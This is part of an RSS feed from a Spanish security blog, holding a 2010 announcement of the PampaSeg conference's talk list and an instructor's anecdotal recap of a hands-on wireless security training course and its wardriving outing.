&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_8alnjaETaog/TPZmK1E5GuI/AAAAAAAAFSY/jm9W_RAo_AQ/s1600/pampaseg.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="138" src="http://1.bp.blogspot.com/_8alnjaETaog/TPZmK1E5GuI/AAAAAAAAFSY/jm9W_RAo_AQ/s400/pampaseg.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.pampaseg.org/"&gt;PampaSeg&lt;/a&gt; es un evento de tecnología, comunicaciones y open source, pero que hace mucho foco en la seguridad, y ya en su 2a. edición nos demuestra que ha llegado para quedarse :)&lt;br /&gt;
&lt;br /&gt;
Algunas de las &lt;a href="http://www.pampaseg.org/charlas.php"&gt;charlas&lt;/a&gt; de la conferencia son:&lt;/div&gt;&lt;br /&gt;
- Atacando WiFi II&lt;br /&gt;
- Man in the middle SSL&lt;br /&gt;
- Bacula. La Ultima Linea de Defensa&lt;br /&gt;
- OpenVPN&lt;br /&gt;
- Buenos Aires Libre&lt;br /&gt;
- Data Analytics en Seguridad de Gobierno y Sector Privado&lt;br /&gt;
- Programación para dispositivos móviles&lt;br /&gt;
- Una forma divertida de aprender seguridad&lt;br /&gt;
- Ingeniería Social&lt;br /&gt;
- Recoleccion de datos en Google&lt;br /&gt;
- Secure Software&lt;br /&gt;
- Introducción al lockpicking&lt;br /&gt;
- Fraudes en internet&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Las jornadas tendrán lugar en el Auditorio del Honorable Concejo Deliberante, Av. San Martín 27, de la ciudad de Santa Rosa, La Pampa.&lt;br /&gt;
&lt;br /&gt;
Si están por la zona no se lo pueden perder!&lt;/div&gt;&lt;br /&gt;
Posts relacionados:&lt;br /&gt;
- &lt;a href="http://www.kungfoosion.com/2009/12/primera-edicion-de-pampaseg.html"&gt;Primera edición de PampaSeg &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-5667853759793269516?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/0u8uiVFIgxQ" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/0u8uiVFIgxQ/se-viene-pampaseg-2010.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_8alnjaETaog/TPZmK1E5GuI/AAAAAAAAFSY/jm9W_RAo_AQ/s72-c/pampaseg.gif" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2010/12/se-viene-pampaseg-2010.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-193058836427762262</guid><pubDate>Mon, 29 Nov 2010 17:16:00 +0000</pubDate><atom:updated>2010-12-03T17:17:27.873-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">WiFu_Training</category><title>Crónicas del WiFu COMBAT Training</title><description>&lt;div style="text-align: justify;"&gt;Recientemente se celebró una nueva edición del &lt;a href="http://www.base4sec.com/capacitacion-detalle.php?id=408"&gt;WiFu COMBAT Training&lt;/a&gt; y por supuesto quedaron muchas anécdotas por contar :)&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_8alnjaETaog/TPPYhwqt_ZI/AAAAAAAAFR0/prUA7jhDxhs/s1600/grupete.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="331" src="http://3.bp.blogspot.com/_8alnjaETaog/TPPYhwqt_ZI/AAAAAAAAFR0/prUA7jhDxhs/s400/grupete.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Esta vez si tuve la oportunidad de tomar el &lt;a href="http://www.base4sec.com/capacitacion-detalle.php?id=408"&gt;WiFu COMBAT Training&lt;/a&gt; dictado por &lt;a href="http://twitter.com/jpdborgna"&gt;Juan Pablo Borgna&lt;/a&gt; y me encanto! No solo pude construir una antena biquad con mis propias manos, algo impensado para alguien con tan pocos skills manuales como yo, sino que mejore mucho todo mi wireless ninjitsu ;-)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Sin mas preámbulos los dejo con la review escrita por el Sr. "Instructor" del &lt;a href="http://www.base4sec.com/capacitacion-detalle.php?id=408"&gt;WiFu&lt;/a&gt;.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;Review por Juan Pablo Borgna&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;La semana pasada dicte por segunda vez el &lt;a href="http://www.base4sec.com/capacitacion-detalle.php?id=408"&gt;WiFu COMBAT Training&lt;/a&gt;, nuevamente fueron 3 días con el uso del procesador al 100%!&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como es la naturaleza del training, la teoría paso rápido, con lo justo y necesario, y en seguida los ninjas estaban _rompiendo_ el access point del laboratorio. Minutos después estaban rompiendo todo...&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Me gusto, algo particular de este grupo, que se respetaban para inyectar los paquetes (no &lt;a href="http://www.kungfoosion.com/2010/09/primera-edicion-del-wifu-combat.html"&gt;como otros&lt;/a&gt; que mantenían un constante cortocircuito en el aire, jajaja) y gracias a eso todos pudieron realizar los ejercicios rapidísimo y sin ningún problema, mientras el resto del grupo monitoreaba con el airodump. Pero claro, nada que funcione tan bien es educativo, mucho menos cuando se trata de wireless, por eso tuvimos que probar con otros "equipos de laboratorio". &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Caso interesante el que encontró &lt;a href="http://twitter.com/gduperre"&gt;@gduperre&lt;/a&gt;, con un AP que opuso mayor resistencia. Haberlo vencido :) fue muy didáctico y educativo para todo el grupo. La clave (pero no lo único) fue cambiar la antena por la biquad hecha a mano ;)&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_8alnjaETaog/TPPZnWxGX_I/AAAAAAAAFR4/Wi41hLJM0kc/s1600/antena.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="336" src="http://4.bp.blogspot.com/_8alnjaETaog/TPPZnWxGX_I/AAAAAAAAFR4/Wi41hLJM0kc/s400/antena.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;En este curso tenían mas interés sobre la seguridad de los clientes que de la infraestructura, así que dedicamos bastante tiempo a practicar phishing, usar sniffers, realizar redirecciones de DNS y esas cosas. De repente la ip publica de facebook.com era la 10.0.0.1 ...&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como siempre salimos de paseo, esta vez camuflados de milanesas de soja para no llamar la atención.&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_8alnjaETaog/TPPZzBnTsaI/AAAAAAAAFR8/7Ytzc-gkQE8/s1600/camioneta.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://1.bp.blogspot.com/_8alnjaETaog/TPPZzBnTsaI/AAAAAAAAFR8/7Ytzc-gkQE8/s400/camioneta.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Ya adentro, la "infraestructura" montada en pocos minutos me llena de orgullo: red cableada local a través de un switch, el GPS compartido (que primero se porto bastante mal hasta que salió andando para todos), dos portátiles con 2 placas cada una, una con una antena de cada lado...&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Creo que se pudo probar todo, ya que cada uno hacia algo distinto, inyección de paquetes, rogue ap, karmetasploit, sniffers, al final el wardriving estándar lo termino haciendo un iPad que andaba por ahí...&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Lógicamente, como somos todos muy responsables, no capturamos ni guardamos información privada de ningún individuo ajeno al curso, ningún tercero fue perjudicado de ninguna manera. También hay que aclarar que ningún animal fue dañado ni perjudicado durante el transcurso de este paseo. El único detalle es que &lt;a href="http://twitter.com/kfs"&gt;@kfs&lt;/a&gt; acusa dolor de cabeza cuando las placas de 1000mW de potencia están transmitiendo.&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&amp;nbsp;&lt;object height="326" width="400"&gt;&lt;param name="movie" value="http://www.youtube.com/v/aDYcO39mr9o?fs=1&amp;amp;hl=en_US"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/aDYcO39mr9o?fs=1&amp;amp;hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="400" height="326"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&amp;nbsp; &lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Al final, la katana se la llevó &lt;a href="http://twitter.com/gduperre"&gt;@gduperre&lt;/a&gt; ya que logró concretar primero todos los laboratorios, aunque su antena biquad no sea las mas prolija del mundo... El segundo puesto lo empataron Leandro y Tony. Debo hacer igualmente mención especial a &lt;a href="http://twitter.com/p4dawan"&gt;Lucas&lt;/a&gt;, quien muy calladito en su rincón estaba siempre un paso adelante.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Un análisis del curso muestra que:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- &lt;a href="http://twitter.com/gduperre"&gt;@gduperre&lt;/a&gt; compraba placas y antenas por mercado libre y se las hacia mandar directamente al aula&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- Leandro, el electrónico del curso, hizo una antena que no andaba y se va a hacer otra en su casa (dijo...)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- Tony estaba preocupado por la seguridad de la red wireless de su trabajo (creo que no la va a prender mas…)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- A &lt;a href="http://twitter.com/kfs"&gt;Leo&lt;/a&gt; le duele la cabeza cuando ve una antena muy grande&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- Mi super GPS no andaba mal, era el backtrack&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- El chofer de la combi del soja wardriving miraba y le parecía que estábamos haciendo algo malo (obvio que no), pero igualmente se copó con todo lo que le pedimos...&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como siempre para mi es un placer dar este training y hacerlo crecer, el objetivo a cumplir es "que sea el mejor y mas practico training de seguridad wireless", por mi parte ya tengo material nuevo para el próximo curso. ;-)&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;- &lt;a href="http://picasaweb.google.com/lpigner/WiFu_COMBAT_BA_11_2010#"&gt;Mas fotos del WiFu de Noviembre 2010&lt;/a&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-193058836427762262?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/jDaKYOPDZ0k" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/jDaKYOPDZ0k/cronicas-del-wifu-combat-training.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_8alnjaETaog/TPPYhwqt_ZI/AAAAAAAAFR0/prUA7jhDxhs/s72-c/grupete.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2010/11/cronicas-del-wifu-combat-training.html</feedburner:origLink></item></channel></rss>

